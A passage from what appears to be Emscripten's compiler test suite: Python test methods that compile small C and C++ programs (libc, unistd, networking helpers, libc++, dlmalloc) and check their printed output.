#include <errno.h>
#include <sys/statvfs.h>
int main() {
struct statvfs s;
printf("result: %d\n", statvfs("/test", &s));
printf("errno: %d\n", errno);
printf("f_bsize: %lu\n", s.f_bsize);
printf("f_frsize: %lu\n", s.f_frsize);
printf("f_blocks: %lu\n", s.f_blocks);
printf("f_bfree: %lu\n", s.f_bfree);
printf("f_bavail: %lu\n", s.f_bavail);
printf("f_files: %d\n", s.f_files > 5);
printf("f_ffree: %lu\n", s.f_ffree);
printf("f_favail: %lu\n", s.f_favail);
printf("f_fsid: %lu\n", s.f_fsid);
printf("f_flag: %lu\n", s.f_flag);
printf("f_namemax: %lu\n", s.f_namemax);
return 0;
}
'''
expected = r'''
result: 0
errno: 0
f_bsize: 4096
f_frsize: 4096
f_blocks: 1000000
f_bfree: 500000
f_bavail: 500000
f_files: 1
f_ffree: 1000000
f_favail: 1000000
f_fsid: 42
f_flag: 2
f_namemax: 255
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_libgen(self):
src = r'''
#include <stdio.h>
#include <libgen.h>
int main() {
char p1[16] = "/usr/lib", p1x[16] = "/usr/lib";
printf("%s -> ", p1);
printf("%s : %s\n", dirname(p1x), basename(p1));
char p2[16] = "/usr", p2x[16] = "/usr";
printf("%s -> ", p2);
printf("%s : %s\n", dirname(p2x), basename(p2));
char p3[16] = "/usr/", p3x[16] = "/usr/";
printf("%s -> ", p3);
printf("%s : %s\n", dirname(p3x), basename(p3));
char p4[16] = "/usr/lib///", p4x[16] = "/usr/lib///";
printf("%s -> ", p4);
printf("%s : %s\n", dirname(p4x), basename(p4));
char p5[16] = "/", p5x[16] = "/";
printf("%s -> ", p5);
printf("%s : %s\n", dirname(p5x), basename(p5));
char p6[16] = "///", p6x[16] = "///";
printf("%s -> ", p6);
printf("%s : %s\n", dirname(p6x), basename(p6));
char p7[16] = "/usr/../lib/..", p7x[16] = "/usr/../lib/..";
printf("%s -> ", p7);
printf("%s : %s\n", dirname(p7x), basename(p7));
char p8[16] = "", p8x[16] = "";
printf("(empty) -> %s : %s\n", dirname(p8x), basename(p8));
printf("(null) -> %s : %s\n", dirname(0), basename(0));
return 0;
}
'''
expected = '''
/usr/lib -> /usr : lib
/usr -> / : usr
/usr/ -> / : usr
/usr/lib/// -> /usr : lib
/ -> / : /
/// -> / : /
/usr/../lib/.. -> /usr/../lib : ..
(empty) -> . : .
(null) -> . : .
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_utime(self):
src = open(path_from_root('tests', 'utime', 'test_utime.c'), 'r').read()
self.do_run(src, 'success', force_c=True)
def test_utf(self):
self.banned_js_engines = [SPIDERMONKEY_ENGINE] # only node handles utf well
Settings.EXPORTED_FUNCTIONS = ['_main', '_malloc']
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
char *c = "μ†ℱ ╋ℯ╳╋";
printf("%d %d %d %d %s\n", c[0]&0xff, c[1]&0xff, c[2]&0xff, c[3]&0xff, c);
emscripten_run_script("cheez = _malloc(100);"
"Module.writeStringToMemory(\"μ†ℱ ╋ℯ╳╋\", cheez);"
"Module.print([Pointer_stringify(cheez), Module.getValue(cheez, 'i8')&0xff, Module.getValue(cheez+1, 'i8')&0xff, Module.getValue(cheez+2, 'i8')&0xff, Module.getValue(cheez+3, 'i8')&0xff, ]);");
}
'''
self.do_run(src, '206 188 226 128 μ†ℱ ╋ℯ╳╋\nμ†ℱ ╋ℯ╳╋,206,188,226,128\n');
def test_direct_string_constant_usage(self):
if self.emcc_args is None: return self.skip('requires libcxx')
src = '''
#include <iostream>
template<int i>
void printText( const char (&text)[ i ] )
{
std::cout << text;
}
int main()
{
printText( "some string constant" );
return 0;
}
'''
self.do_run(src, "some string constant")
def test_std_cout_new(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <iostream>
struct NodeInfo { //structure that we want to transmit to our shaders
float x;
float y;
float s;
float c;
};
const int nbNodes = 100;
NodeInfo * data = new NodeInfo[nbNodes]; //our data that will be transmitted using float texture.
template<int i>
void printText( const char (&text)[ i ] )
{
std::cout << text << std::endl;
}
int main()
{
printText( "some string constant" );
return 0;
}
'''
self.do_run(src, "some string constant")
def test_istream(self):
if self.emcc_args is None: return self.skip('requires libcxx')
src = '''
#include <string>
#include <sstream>
#include <iostream>
int main()
{
std::string mystring("1 2 3");
std::istringstream is(mystring);
int one, two, three;
is >> one >> two >> three;
printf( "%i %i %i", one, two, three );
}
'''
for linkable in [0]:#, 1]:
print linkable
Settings.LINKABLE = linkable # regression check for issue #273
self.do_run(src, "1 2 3")
def test_fs_base(self):
Settings.INCLUDE_FULL_LIBRARY = 1
try:
addJS = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace('FS.init();', '').replace( # Disable normal initialization, replace with ours
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'filesystem', 'src.js'), 'r').read())
open(filename, 'w').write(src)
'''
src = 'int main() {return 0;}\n'
expected = open(path_from_root('tests', 'filesystem', 'output.txt'), 'r').read()
self.do_run(src, expected, post_build=addJS, extra_emscripten_args=['-H', 'libc/fcntl.h,libc/sys/unistd.h,poll.h,libc/math.h,libc/langinfo.h,libc/time.h'])
finally:
Settings.INCLUDE_FULL_LIBRARY = 0
def test_unistd_access(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'access.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'access.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'access.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_curdir(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'curdir.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'curdir.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'curdir.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_close(self):
src = open(path_from_root('tests', 'unistd', 'close.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'close.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_confstr(self):
src = open(path_from_root('tests', 'unistd', 'confstr.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'confstr.out'), 'r').read()
self.do_run(src, expected, extra_emscripten_args=['-H', 'libc/unistd.h'])
def test_unistd_ttyname(self):
src = open(path_from_root('tests', 'unistd', 'ttyname.c'), 'r').read()
self.do_run(src, 'success', force_c=True)
def test_unistd_dup(self):
src = open(path_from_root('tests', 'unistd', 'dup.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'dup.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_pathconf(self):
src = open(path_from_root('tests', 'unistd', 'pathconf.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'pathconf.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_truncate(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'truncate.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'truncate.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'truncate.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_swab(self):
src = open(path_from_root('tests', 'unistd', 'swab.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'swab.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_isatty(self):
src = open(path_from_root('tests', 'unistd', 'isatty.c'), 'r').read()
self.do_run(src, 'success', force_c=True)
def test_unistd_sysconf(self):
src = open(path_from_root('tests', 'unistd', 'sysconf.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'sysconf.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_login(self):
src = open(path_from_root('tests', 'unistd', 'login.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'login.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_unlink(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'unlink.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'unlink.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'unlink.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_links(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'links.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'links.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'links.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_sleep(self):
src = open(path_from_root('tests', 'unistd', 'sleep.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'sleep.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_io(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'io.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'io.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'io.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_misc(self):
src = open(path_from_root('tests', 'unistd', 'misc.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'misc.out'), 'r').read()
self.do_run(src, expected)
def test_uname(self):
src = r'''
#include <stdio.h>
#include <sys/utsname.h>
int main() {
struct utsname u;
printf("ret: %d\n", uname(&u));
printf("sysname: %s\n", u.sysname);
printf("nodename: %s\n", u.nodename);
printf("release: %s\n", u.release);
printf("version: %s\n", u.version);
printf("machine: %s\n", u.machine);
printf("invalid: %d\n", uname(0));
return 0;
}
'''
expected = '''
ret: 0
sysname: Emscripten
nodename: emscripten
release: 1.0
version: #1
machine: x86-JS
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_env(self):
src = open(path_from_root('tests', 'env', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'env', 'output.txt'), 'r').read()
self.do_run(src, expected)
def test_systypes(self):
src = open(path_from_root('tests', 'systypes', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'systypes', 'output.txt'), 'r').read()
self.do_run(src, expected)
def test_getloadavg(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
double load[5] = {42.13, 42.13, 42.13, 42.13, 42.13};
printf("ret: %d\n", getloadavg(load, 5));
printf("load[0]: %.3lf\n", load[0]);
printf("load[1]: %.3lf\n", load[1]);
printf("load[2]: %.3lf\n", load[2]);
printf("load[3]: %.3lf\n", load[3]);
printf("load[4]: %.3lf\n", load[4]);
return 0;
}
'''
expected = '''
ret: 3
load[0]: 0.100
load[1]: 0.100
load[2]: 0.100
load[3]: 42.130
load[4]: 42.130
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_inet(self):
src = r'''
#include <stdio.h>
#include <arpa/inet.h>
int main() {
printf("*%x,%x,%x,%x,%x,%x*\n", htonl(0xa1b2c3d4), htonl(0xfe3572e0), htonl(0x07abcdf0), htons(0xabcd), ntohl(0x43211234), ntohs(0xbeaf));
in_addr_t i = inet_addr("190.180.10.78");
printf("%x\n", i);
return 0;
}
'''
self.do_run(src, '*d4c3b2a1,e07235fe,f0cdab07,cdab,34122143,afbe*\n4e0ab4be\n')
def test_inet2(self):
src = r'''
#include <stdio.h>
#include <arpa/inet.h>
int main() {
struct in_addr x, x2;
int *y = (int*)&x;
*y = 0x12345678;
printf("%s\n", inet_ntoa(x));
int r = inet_aton(inet_ntoa(x), &x2);
printf("%s\n", inet_ntoa(x2));
return 0;
}
'''
self.do_run(src, '120.86.52.18\n120.86.52.18\n')
def test_gethostbyname(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip("assume t2 in gethostbyname")
src = r'''
#include <netdb.h>
#include <stdio.h>
void test(char *hostname) {
hostent *host = gethostbyname(hostname);
if (!host) {
printf("no such thing\n");
return;
}
printf("%s : %d : %d\n", host->h_name, host->h_addrtype, host->h_length);
char **name = host->h_aliases;
while (*name) {
printf("- %s\n", *name);
name++;
}
name = host->h_addr_list;
while (name && *name) {
printf("* ");
for (int i = 0; i < host->h_length; i++)
printf("%d.", (*name)[i]);
printf("\n");
name++;
}
}
int main() {
test("www.cheezburger.com");
test("fail.on.this.never.work"); // we will "work" on this - because we are just making aliases of names to ips
test("localhost");
return 0;
}
'''
self.do_run(src, '''www.cheezburger.com : 2 : 4
* -84.29.1.0.
fail.on.this.never.work : 2 : 4
* -84.29.2.0.
localhost : 2 : 4
* -84.29.3.0.
''')
def test_799(self):
src = open(path_from_root('tests', '799.cpp'), 'r').read()
self.do_run(src, '''Set PORT family: 0, port: 3979
Get PORT family: 0
PORT: 3979
''')
def test_ctype(self):
# The bit fiddling done by the macros using __ctype_b_loc requires this.
Settings.CORRECT_SIGNS = 1
src = open(path_from_root('tests', 'ctype', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'ctype', 'output.txt'), 'r').read()
self.do_run(src, expected)
def test_strcasecmp(self):
src = r'''
#include <stdio.h>
#include <strings.h>
int sign(int x) {
if (x < 0) return -1;
if (x > 0) return 1;
return 0;
}
int main() {
printf("*\n");
printf("%d\n", sign(strcasecmp("hello", "hello")));
printf("%d\n", sign(strcasecmp("hello1", "hello")));
printf("%d\n", sign(strcasecmp("hello", "hello1")));
printf("%d\n", sign(strcasecmp("hello1", "hello1")));
printf("%d\n", sign(strcasecmp("iello", "hello")));
printf("%d\n", sign(strcasecmp("hello", "iello")));
printf("%d\n", sign(strcasecmp("A", "hello")));
printf("%d\n", sign(strcasecmp("Z", "hello")));
printf("%d\n", sign(strcasecmp("a", "hello")));
printf("%d\n", sign(strcasecmp("z", "hello")));
printf("%d\n", sign(strcasecmp("hello", "a")));
printf("%d\n", sign(strcasecmp("hello", "z")));
printf("%d\n", sign(strcasecmp("Hello", "hello")));
printf("%d\n", sign(strcasecmp("Hello1", "hello")));
printf("%d\n", sign(strcasecmp("Hello", "hello1")));
printf("%d\n", sign(strcasecmp("Hello1", "hello1")));
printf("%d\n", sign(strcasecmp("Iello", "hello")));
printf("%d\n", sign(strcasecmp("Hello", "iello")));
printf("%d\n", sign(strcasecmp("A", "hello")));
printf("%d\n", sign(strcasecmp("Z", "hello")));
printf("%d\n", sign(strcasecmp("a", "hello")));
printf("%d\n", sign(strcasecmp("z", "hello")));
printf("%d\n", sign(strcasecmp("Hello", "a")));
printf("%d\n", sign(strcasecmp("Hello", "z")));
printf("%d\n", sign(strcasecmp("hello", "Hello")));
printf("%d\n", sign(strcasecmp("hello1", "Hello")));
printf("%d\n", sign(strcasecmp("hello", "Hello1")));
printf("%d\n", sign(strcasecmp("hello1", "Hello1")));
printf("%d\n", sign(strcasecmp("iello", "Hello")));
printf("%d\n", sign(strcasecmp("hello", "Iello")));
printf("%d\n", sign(strcasecmp("A", "Hello")));
printf("%d\n", sign(strcasecmp("Z", "Hello")));
printf("%d\n", sign(strcasecmp("a", "Hello")));
printf("%d\n", sign(strcasecmp("z", "Hello")));
printf("%d\n", sign(strcasecmp("hello", "a")));
printf("%d\n", sign(strcasecmp("hello", "z")));
printf("%d\n", sign(strcasecmp("Hello", "Hello")));
printf("%d\n", sign(strcasecmp("Hello1", "Hello")));
printf("%d\n", sign(strcasecmp("Hello", "Hello1")));
printf("%d\n", sign(strcasecmp("Hello1", "Hello1")));
printf("%d\n", sign(strcasecmp("Iello", "Hello")));
printf("%d\n", sign(strcasecmp("Hello", "Iello")));
printf("%d\n", sign(strcasecmp("A", "Hello")));
printf("%d\n", sign(strcasecmp("Z", "Hello")));
printf("%d\n", sign(strcasecmp("a", "Hello")));
printf("%d\n", sign(strcasecmp("z", "Hello")));
printf("%d\n", sign(strcasecmp("Hello", "a")));
printf("%d\n", sign(strcasecmp("Hello", "z")));
printf("%d\n", sign(strncasecmp("hello", "hello", 3)));
printf("%d\n", sign(strncasecmp("hello1", "hello", 3)));
printf("%d\n", sign(strncasecmp("hello", "hello1", 3)));
printf("%d\n", sign(strncasecmp("hello1", "hello1", 3)));
printf("%d\n", sign(strncasecmp("iello", "hello", 3)));
printf("%d\n", sign(strncasecmp("hello", "iello", 3)));
printf("%d\n", sign(strncasecmp("A", "hello", 3)));
printf("%d\n", sign(strncasecmp("Z", "hello", 3)));
printf("%d\n", sign(strncasecmp("a", "hello", 3)));
printf("%d\n", sign(strncasecmp("z", "hello", 3)));
printf("%d\n", sign(strncasecmp("hello", "a", 3)));
printf("%d\n", sign(strncasecmp("hello", "z", 3)));
printf("*\n");
return 0;
}
'''
self.do_run(src, '''*\n0\n1\n-1\n0\n1\n-1\n-1\n1\n-1\n1\n1\n-1\n0\n1\n-1\n0\n1\n-1\n-1\n1\n-1\n1\n1\n-1\n0\n1\n-1\n0\n1\n-1\n-1\n1\n-1\n1\n1\n-1\n0\n1\n-1\n0\n1\n-1\n-1\n1\n-1\n1\n1\n-1\n0\n0\n0\n0\n1\n-1\n-1\n1\n-1\n1\n1\n-1\n*\n''')
def test_atomic(self):
src = '''
#include <stdio.h>
int main() {
int x = 10;
int y = __sync_add_and_fetch(&x, 5);
printf("*%d,%d*\\n", x, y);
x = 10;
y = __sync_fetch_and_add(&x, 5);
printf("*%d,%d*\\n", x, y);
x = 10;
y = __sync_lock_test_and_set(&x, 6);
printf("*%d,%d*\\n", x, y);
x = 10;
y = __sync_bool_compare_and_swap(&x, 9, 7);
printf("*%d,%d*\\n", x, y);
y = __sync_bool_compare_and_swap(&x, 10, 7);
printf("*%d,%d*\\n", x, y);
return 0;
}
'''
self.do_run(src, '*15,15*\n*15,10*\n*6,10*\n*10,0*\n*7,1*')
def test_phiundef(self):
src = r'''
#include <stdlib.h>
#include <stdio.h>
static int state;
struct my_struct {
union {
struct {
unsigned char a;
unsigned char b;
} c;
unsigned int d;
} e;
unsigned int f;
};
int main(int argc, char **argv) {
struct my_struct r;
state = 0;
for (int i=0;i<argc+10;i++)
{
if (state % 2 == 0)
r.e.c.a = 3;
else
printf("%d\n", r.e.c.a);
state++;
}
return 0;
}
'''
self.do_run(src, '3\n3\n3\n3\n3\n')
# libc++ tests
def test_iostream(self):
if Settings.QUANTUM_SIZE == 1: return self.skip("we don't support libcxx in q1")
if self.emcc_args is None:
if Building.LLVM_OPTS: return self.skip('optimizing bitcode before emcc can confuse libcxx inclusion')
self.emcc_args = [] # libc++ auto-inclusion is only done if we use emcc
Settings.SAFE_HEAP = 0 # Some spurious warnings from libc++ internals
src = '''
#include <iostream>
int main()
{
std::cout << "hello world" << std::endl << 77 << "." << std::endl;
return 0;
}
'''
# FIXME: should not have so many newlines in output here
self.do_run(src, 'hello world\n77.\n')
def test_stdvec(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <vector>
#include <stdio.h>
struct S {
int a;
float b;
};
void foo(int a, float b)
{
printf("%d:%.2f\\n", a, b);
}
int main ( int argc, char *argv[] )
{
std::vector<S> ar;
S s;
s.a = 789;
s.b = 123.456f;
ar.push_back(s);
s.a = 0;
s.b = 100.1f;
ar.push_back(s);
foo(ar[0].a, ar[0].b);
foo(ar[1].a, ar[1].b);
}
'''
self.do_run(src, '789:123.46\n0:100.1')
def test_reinterpreted_ptrs(self):
if self.emcc_args is None: return self.skip('needs emcc and libc')
src = r'''
#include <stdio.h>
class Foo {
private:
float bar;
public:
int baz;
Foo(): bar(0), baz(4711) {};
int getBar() const;
};
int Foo::getBar() const {
return this->bar;
};
const Foo *magic1 = reinterpret_cast<Foo*>(0xDEAD111F);
const Foo *magic2 = reinterpret_cast<Foo*>(0xDEAD888F);
static void runTest() {
const Foo *a = new Foo();
const Foo *b = a;
if (a->getBar() == 0) {
if (a->baz == 4712)
b = magic1;
else
b = magic2;
}
printf("%s\n", (b == magic1 ? "magic1" : (b == magic2 ? "magic2" : "neither")));
};
extern "C" {
int main(int argc, char **argv) {
runTest();
}
}
'''
self.do_run(src, 'magic2')
def test_jansson(self):
return self.skip('currently broken')
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('requires ta2')
if Settings.SAFE_HEAP: return self.skip('jansson is not safe-heap safe')
src = '''
#include <jansson.h>
#include <stdio.h>
#include <string.h>
int main()
{
const char* jsonString = "{\\"key\\": \\"value\\",\\"array\\": [\\"array_item1\\",\\"array_item2\\",\\"array_item3\\"],\\"dict\\":{\\"number\\": 3,\\"float\\": 2.2}}";
json_error_t error;
json_t *root = json_loadb(jsonString, strlen(jsonString), 0, &error);
if(!root) {
printf("Node `root` is `null`.");
return 0;
}
if(!json_is_object(root)) {
printf("Node `root` is no object.");
return 0;
}
printf("%s\\n", json_string_value(json_object_get(root, "key")));
json_t *array = json_object_get(root, "array");
if(!array) {
printf("Node `array` is `null`.");
return 0;
}
if(!json_is_array(array)) {
printf("Node `array` is no array.");
return 0;
}
for(size_t i=0; i<json_array_size(array); ++i)
{
json_t *arrayNode = json_array_get(array, i);
if(!root || !json_is_string(arrayNode))
return 0;
printf("%s\\n", json_string_value(arrayNode));
}
json_t *dict = json_object_get(root, "dict");
if(!dict || !json_is_object(dict))
return 0;
json_t *numberNode = json_object_get(dict, "number");
json_t *floatNode = json_object_get(dict, "float");
if(!numberNode || !json_is_number(numberNode) ||
!floatNode || !json_is_real(floatNode))
return 0;
printf("%i\\n", json_integer_value(numberNode));
printf("%.2f\\n", json_number_value(numberNode));
printf("%.2f\\n", json_real_value(floatNode));
json_t *invalidNode = json_object_get(dict, "invalidNode");
if(invalidNode)
return 0;
printf("%i\\n", json_number_value(invalidNode));
json_decref(root);
if(!json_is_object(root))
printf("jansson!\\n");
return 0;
}
'''
self.do_run(src, 'value\narray_item1\narray_item2\narray_item3\n3\n3.00\n2.20\nJansson: Node with ID `0` not found. Context has `10` nodes.\n0\nJansson: No JSON context.\njansson!')
### 'Medium' tests
def test_fannkuch(self):
results = [ (1,0), (2,1), (3,2), (4,4), (5,7), (6,10), (7, 16), (8,22) ]
for i, j in results:
src = open(path_from_root('tests', 'fannkuch.cpp'), 'r').read()
self.do_run(src, 'Pfannkuchen(%d) = %d.' % (i,j), [str(i)], no_build=i>1)
def test_raytrace(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.USE_TYPED_ARRAYS == 2: return self.skip('Relies on double value rounding, extremely sensitive')
src = open(path_from_root('tests', 'raytrace.cpp'), 'r').read().replace('double', 'float')
output = open(path_from_root('tests', 'raytrace.ppm'), 'r').read()
self.do_run(src, output, ['3', '16'])#, build_ll_hook=self.do_autodebug)
def test_fasta(self):
if self.emcc_args is None: return self.skip('requires emcc')
results = [ (1,'''GG*ctt**tgagc*'''), (20,'''GGCCGGGCGCGGTGGCTCACGCCTGTAATCCCAGCACTTT*cttBtatcatatgctaKggNcataaaSatgtaaaDcDRtBggDtctttataattcBgtcg**tacgtgtagcctagtgtttgtgttgcgttatagtctatttgtggacacagtatggtcaaa**tgacgtcttttgatctgacggcgttaacaaagatactctg*'''),
(50,'''GGCCGGGCGCGGTGGCTCACGCCTGTAATCCCAGCACTTTGGGAGGCCGAGGCGGGCGGA*TCACCTGAGGTCAGGAGTTCGAGACCAGCCTGGCCAACAT*cttBtatcatatgctaKggNcataaaSatgtaaaDcDRtBggDtctttataattcBgtcg**tactDtDagcctatttSVHtHttKtgtHMaSattgWaHKHttttagacatWatgtRgaaa**NtactMcSMtYtcMgRtacttctWBacgaa**agatactctgggcaacacacatacttctctcatgttgtttcttcggacctttcataacct**ttcctggcacatggttagctgcacatcacaggattgtaagggtctagtggttcagtgagc**ggaatatcattcgtcggtggtgttaatctatctcggtgtagcttataaatgcatccgtaa**gaatattatgtttatttgtcggtacgttcatggtagtggtgtcgccgatttagacgtaaa**ggcatgtatg*''') ]
for i, j in results:
src = open(path_from_root('tests', 'fasta.cpp'), 'r').read()
self.do_run(src, j, [str(i)], lambda x, err: x.replace('\n', '*'), no_build=i>1)
def test_whets(self):
if not Settings.ASM_JS: return self.skip('mainly a test for asm validation here')
self.do_run(open(path_from_root('tests', 'whets.cpp')).read(), 'Single Precision C Whetstone Benchmark')
def test_dlmalloc(self):
if self.emcc_args is None: self.emcc_args = [] # dlmalloc auto-inclusion is only done if we use emcc
self.banned_js_engines = [NODE_JS] # slower, and fail on 64-bit
Settings.CORRECT_SIGNS = 2
Settings.CORRECT_SIGNS_LINES = ['src.cpp:' + str(i+4) for i in [4816, 4191, 4246, 4199, 4205, 4235, 4227]]
Settings.TOTAL_MEMORY = 128*1024*1024 # needed with typed arrays
src = open(path_from_root('system', 'lib', 'dlmalloc.c'), 'r').read() + '\n\n\n' + open(path_from_root('tests', 'dlmalloc_test.c'), 'r').read()
self.do_run(src, '*1,0*', ['200', '1'])
self.do_run(src, '*400,0*', ['400', '400'], no_build=True)
# Linked version
src = open(path_from_root('tests', 'dlmalloc_test.c'), 'r').read()
self.do_run(src, '*1,0*', ['200', '1'], extra_emscripten_args=['-m'])
self.do_run(src, '*400,0*', ['400', '400'], extra_emscripten_args=['-m'], no_build=True)
if self.emcc_args == []: # TODO: do this in other passes too, passing their opts into emcc
# emcc should build in dlmalloc automatically, and do all the sign correction etc. for it
try_delete(os.path.join(self.get_dir(), 'src.cpp.o.js'))
output = Popen([PYTHON, EMCC, path_from_root('tests', 'dlmalloc_test.c'), '-s', 'TOTAL_MEMORY=' + str(128*1024*1024),
'-o', os.path.join(self.get_dir(), 'src.cpp.o.js')], stdout=PIPE, stderr=self.stderr_redirect).communicate()
self.do_run('x', '*1,0*', ['200', '1'], no_build=True)
self.do_run('x', '*400,0*', ['400', '400'], no_build=True)
# The same for new and all its variants
src = open(path_from_root('tests', 'new.cpp')).read()
for new, delete in [
('malloc(100)', 'free'),
('new char[100]', 'delete[]'),
('new Structy', 'delete'),
('new int', 'delete'),
('new Structy[10]', 'delete[]'),
]:
self.do_run(src.replace('{{{ NEW }}}', new).replace('{{{ DELETE }}}', delete), '*1,0*')
def test_dlmalloc_partial(self):
if self.emcc_args is None: return self.skip('only emcc will link in dlmalloc')
# present part of the symbols of dlmalloc, not all
src = open(path_from_root('tests', 'new.cpp')).read().replace('{{{ NEW }}}', 'new int').replace('{{{ DELETE }}}', 'delete') + '''
void *
operator new(size_t size)
{
printf("new %d!\\n", size);
return malloc(size);
}
'''
self.do_run(src, 'new 4!\n*1,0*')
def test_dlmalloc_partial_2(self):
if self.emcc_args is None or 'SAFE_HEAP' in str(self.emcc_args) or 'CHECK_HEAP_ALIGN' in str(self.emcc_args): return self.skip('only emcc will link in dlmalloc, and we do unsafe stuff')
# present part of the symbols of dlmalloc, not all. malloc is harder to link than new which is weak.
src = r'''
#include <stdio.h>
#include <stdlib.h>
void *malloc(size_t size)
{
return (void*)123;
}
int main() {
void *x = malloc(10);
printf("got %p\n", x);
free(x);
printf("freed the faker\n");
return 1;
}
'''
self.do_run(src, 'got 0x7b\nfreed')
def test_libcxx(self):
if self.emcc_args is None: return self.skip('requires emcc')
self.do_run(open(path_from_root('tests', 'hashtest.cpp')).read(),
'june -> 30\nPrevious (in alphabetical order) is july\nNext (in alphabetical order) is march')
self.do_run('''
#include <set>
#include <stdio.h>
int main() {
std::set<int> *fetchOriginatorNums = new std::set<int>();
fetchOriginatorNums->insert(171);
printf("hello world\\n");
return 0;
}
''', 'hello world');
def test_typeid(self):
self.do_run(r'''
#include <stdio.h>
#include <string.h>
#include <typeinfo>
int main() {
printf("*\n");
#define MAX 100
int ptrs[MAX];
int groups[MAX];
memset(ptrs, 0, MAX*sizeof(int));
memset(groups, 0, MAX*sizeof(int));
int next_group = 1;
#define TEST(X) { \
int ptr = (int)&typeid(X); \
int group = 0; \
int i; \
for (i = 0; i < MAX; i++) { \
if (!groups[i]) break; \
if (ptrs[i] == ptr) { \
group = groups[i]; \
break; \
} \
} \
if (!group) { \
groups[i] = group = next_group++; \
ptrs[i] = ptr; \
} \
printf("%s:%d\n", #X, group); \
}
TEST(int);
TEST(unsigned int);
TEST(unsigned);
TEST(signed int);
TEST(long);
TEST(unsigned long);
TEST(signed long);
TEST(long long);
TEST(unsigned long long);
TEST(signed long long);
TEST(short);
TEST(unsigned short);
TEST(signed short);
TEST(char);
TEST(unsigned char);
TEST(signed char);
TEST(float);
TEST(double);
TEST(long double);
TEST(void);
TEST(void*);
printf("*\n");
}
''', '''*
int:1
unsigned int:2
unsigned:2
signed int:1
long:3
unsigned long:4
signed long:3
long long:5
unsigned long long:6
signed long long:5
short:7
unsigned short:8
signed short:7
char:9
unsigned char:10
signed char:11
float:12
double:13
long double:14
void:15
void*:16
*
''');
def test_static_variable(self):
if self.emcc_args is None: Settings.SAFE_HEAP = 0 # LLVM mixes i64 and i8 in the guard check
src = '''
#include <stdio.h>
struct DATA
{
int value;
DATA()
{
value = 0;
}
};
DATA & GetData()
{
static DATA data;
return data;
}
int main()
{
GetData().value = 10;
printf( "value:%i", GetData().value );
}
'''
self.do_run(src, 'value:10')
def test_fakestat(self):
src = r'''
#include <stdio.h>
struct stat { int x, y; };
int main() {
stat s;
s.x = 10;
s.y = 22;
printf("*%d,%d*\n", s.x, s.y);
}
'''
self.do_run(src, '*10,22*')
